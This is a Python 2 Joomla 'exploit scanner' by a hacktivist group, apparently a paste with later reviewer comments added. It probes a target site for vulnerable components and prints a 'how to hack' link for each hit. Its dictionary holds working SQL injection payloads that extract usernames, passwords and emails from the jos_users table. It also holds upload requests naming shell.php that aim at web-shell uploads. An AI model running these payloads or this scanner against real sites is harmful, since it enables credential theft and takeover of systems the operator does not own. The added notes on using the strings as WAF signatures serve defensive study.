CrimeCrew

Joomla! Exploit Scanner[Version 1.0 Beta] [Turkish]

Sep 25th, 2015
  1. #!/usr/bin/python
  2. #Joomla Exploit Scanner Version 1.0 Beta
  3. #Coded by CrimeCrew
  4. #http://hacktivizmgunceleri.blogspot.com.tr/
  5. #https://www.facebook.com/yasir.coskun.Real
  6. #https://www.facebook.com/groups/421380114709514/
  7. #CrimeCrew
  8. import sys
  9. import urllib2
  10. import re
  11. import time
  12. import httplib
  13. import random
  14.  
  15.  
  # HTTP status codes the reporting loop treats as "path not present".
  # Any status outside this list (403, redirects and 5xx included) is printed
  # as a hit, so a reported hit does not show that a component is vulnerable.
  BAD_RESP = [400, 401, 404]
  18.  
  def main(path):
      """Send one HEAD request for ``path`` on the target and return the reply.

      Reads the module-level ``host`` string and splits it at the first "/":
      the left part is used for the connection and the Host header, the right
      part is prefixed to ``path`` to form the request path.

      Returns a ``(status, reason, server_header)`` tuple built from
      ``getreply()``.

      Log-review notes: the request is a HEAD, and Host is the only header this
      code sets explicitly; no User-Agent is added here.
      NOTE(review): httplib.HTTP is the legacy interface and presumably emits
      an HTTP/1.0 request line -- confirm against a capture.
      """
      pieces = host.split("/", 1)
      print "[#] Test Ediliyor:", pieces[1] + path
      try:
          conn = httplib.HTTP(pieces[0])
          conn.putrequest("HEAD", "/" + pieces[1] + path)
          conn.putheader("Host", pieces[0])
          conn.endheaders()
          status, phrase, reply_headers = conn.getreply()
          return status, phrase, reply_headers.get("Server")
      except (), msg:
          # An empty tuple matches no exception type, so this handler never
          # runs: connection and protocol errors propagate to the caller.
          print "Error Occurred:", msg
  31.  
  def timer():
      """Return the current local time as a ``time.asctime`` string.

      No call to this helper appears in the visible listing.
      """
      return time.asctime(time.localtime(time.time()))
  35.  
  def slowprint(s):
      """Write ``s`` plus a newline to stdout one character at a time.

      Each character is flushed immediately and followed by a pause of
      8/90 seconds. No call to this helper appears in the visible listing.
      """
      text = s + '\n'
      pause = 8. / 90
      position = 0
      while position < len(text):
          sys.stdout.write(text[position])
          sys.stdout.flush()  # push the character out before sleeping
          time.sleep(pause)
          position += 1
  41.  
  # Start-up banner: tool name, author tag and the author's blog address.
  print "\n".join((
      "\n Joomla! Exploit Scanner[Version 1.0 Beta]",
      " Coder By CrimeCrew",
      " www.HacktivizmGunceleri.Blogspot.Com.Tr",
  ))
  45.  
  46.  
  # xpls maps a request path to [component label, short link]; the reporting
  # loop prints both for every path it counts as a hit.
  # Each key is appended to the target's base path and requested verbatim.
  # Keys containing "|" are not split anywhere in the visible code, so they go
  # out as one literal path. Keys that already start with "/" yield a doubled
  # slash, because main() builds the path as "/" + base path + key.
  # Defender use: these literals double as access-log / WAF match strings, e.g.
  # the "union select ... from jos_users" query strings, the
  # "ofc_upload_image.php?name=" requests, and HEAD probes for component upload
  # directories under components/ and administrator/components/.
  # NOTE(review): the goo.gl destinations are not visible in this listing;
  # treat them as untrusted links.
  47. xpls = { "images/artforms/attachedfiles/" : ["com_artforms","http://goo.gl/MiQMIu"],"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" : ["com_fabrik","http://goo.gl/mZ3Qsl"] , "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog","http://goo.gl/gAFm9F"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery","http://goo.gl/pgbM6r"], "administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maian15","http://goo.gl/NQWtR6"], "administrator/components/com_maianmedia/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maianmedia","http://goo.gl/vlxGt0"] , "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media","http://goo.gl/y2rLm7"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic","http://goo.gl/REjCvg"], "index.php?option=com_users&view=registration" : ["com_user","http://goo.gl/Bp0IjM"], "index.php?option=com_jce" : ["JCE","http://goo.gl/hVp8Hu"] , "index.php?option=com_user&view=reset&layout=confirm" : ["com_user 2","http://goo.gl/zoTbrf"] , "index.php?option=com_shohada&view=shohada" : ["com_shohada","http://goo.gl/90eMKC"], "index.php?option=com_smartformer" : ["com_smartformer","http://goo.gl/x4m3vA"], "index.php?option=com_garyscookbook&func=newItem" : ["com_garyscookbook","http://goo.gl/e6GAeu"],"index.php/component/osproperty/?task=agent_register" : ["com_osproperty","http://goo.gl/dlKu19"], "index.php?option=com_acymailing&gtask=archive&listid=" : ["com_acymailing [SQLi]","http://goo.gl/2rTCxA"], "index.php?option=com_extplorer&action=show_error&dir=" : 
["com_extplorer","http://goo.gl/8He9vM"] , "index.php?option=com_xmap&tmpl=component&Itemid=999&view=" : ["com_xmap" , "http://goo.gl/gTOxZE"] , "index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*" : ["com_content [SQLi]" , "http://goo.gl/nmzTmE"] , "/index.php?option=com_flippingbook&Itemid=28&book_id=nullunionselectnull,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullfromjos_users/*" : ["com_flippingbook [SQLi]" , "http://goo.gl/fAZvqC"] , "index.php?option=com_phocagallery&view=categories&Itemid=" : ["com_phocagallery" , "http://goo.gl/j2N3Qo"] , "index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--" : ["com_lyftenbloggie [SQLi]" , "http://goo.gl/0EENFD"] , "index.php?option=com_wrapper&view=wrapper&Itemid=":["com_wrapper","http://goo.gl/l1ldl1"] , "index.php?option=com_fireboard&Itemid=":["com_fireboard","http://goo.gl/6jfAzQ"], "j/index.php?option=com_mailto&tmpl=component&template=beez_20&link=":["com_mailto [SPAM]","http://goo.gl/KS9uZO"], "/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc" : ["com_simpleimageupload","http://goo.gl/VcjDSC"], "/administrator/components/com_simplephotogallery/lib/uploadFile.php" : ["com_simplephotogallery","http://goo.gl/LYt0HU"], "/components/com_creativecontactform/fileupload/index.php" : ["com_creativecontactform","http://goo.gl/zqkRPs"],"/index.php?option=com_jfuploader&Itemid=|/index.php?option=com_jfuploader&Itemid=" : ["com_jfuploader","http://goo.gl/IMk9r2"],"/components/com_pinboard/|/components/com_pinboard/popup/popup.php?option=showupload" : ["com_pinboard","http://goo.gl/gBa5X1"],"/components/com_agora/" : 
["com_agora","http://goo.gl/e2hLrd"],"/administrator/components/com_joomla_flash_uploader/" : ["com_joomla_flash_uploader","http://goo.gl/El7Guu"],"/components/com_simpleboard/" : ["SimpleBoard","http://goo.gl/3WzjMP"],"/components/com_joomlaboard/" : ["JoomlaBoard","http://goo.gl/HoXXfR"],"/components/com_expose/uploadimg.php" : ["com_expose","http://goo.gl/O80vlp"],}
  48.  
  # Exactly one command-line argument (the site) is required; otherwise the
  # usage text is printed and the script exits with status 1.
  if len(sys.argv) != 2:
      print "\n".join((
          "\n Usage: joomla.py <site>",
          " Example: joomla.py www.site.com/\n",
      ))
      sys.exit(1)

  # Build the module-level ``host`` that main() reads. Only a literal "http://"
  # is stripped; everything after the last "/" is dropped and a trailing "/"
  # is ensured.
  host = sys.argv[1].replace("http://", "")
  host = host.rsplit("/", 1)[0]
  host = host if host[-1] == "/" else host + "/"
  57.  
  # Reporting loop: one main() call (a HEAD request) per key of xpls, with the
  # outcome printed to stdout. Status strings are Turkish: "Hedef" = target,
  # "Exploit Sayisi" = exploit count, "Exploit Taraniyor" = scanning,
  # "Sonuc" = result, "Nasil Hacklenir" = how to hack.
  # NOTE(review): indentation was lost in this paste, so the nesting of the
  # lines below (for example whether the final "[-] Done" runs once after the
  # loop) cannot be confirmed from the listing.
  58. print "\n[#] Hedef:",host
  59. print "[#] Exploit Sayisi:",len(xpls)
  60.  
  61. print "[#] Exploit Taraniyor"
  # No delay appears between iterations, so in server logs this shows up as a
  # burst of len(xpls) HEAD requests from one client against component paths.
  62. for xpl,(poc,expl) in xpls.items():
  # ``server`` (the Server response header) is unpacked but not used below.
  63. resp,reason,server = main(xpl)
  # Hit test: any status other than 400/401/404 counts, so 403, redirects and
  # 5xx replies are reported too -- a hit does not confirm a vulnerability.
  64. if resp not in BAD_RESP:
  65. print ""
  66. print "[#] Sonuc:",resp, reason
  67. print "[#] Exploit:",poc
  68. print "[#] Nasil Hacklenir:",expl
  69. print "################################################################################"
  70. else:
  71. print ""
  72. print "[-] Sonuc:",resp, reason
  73. print "================================================================================"
  74. print "[-] Done"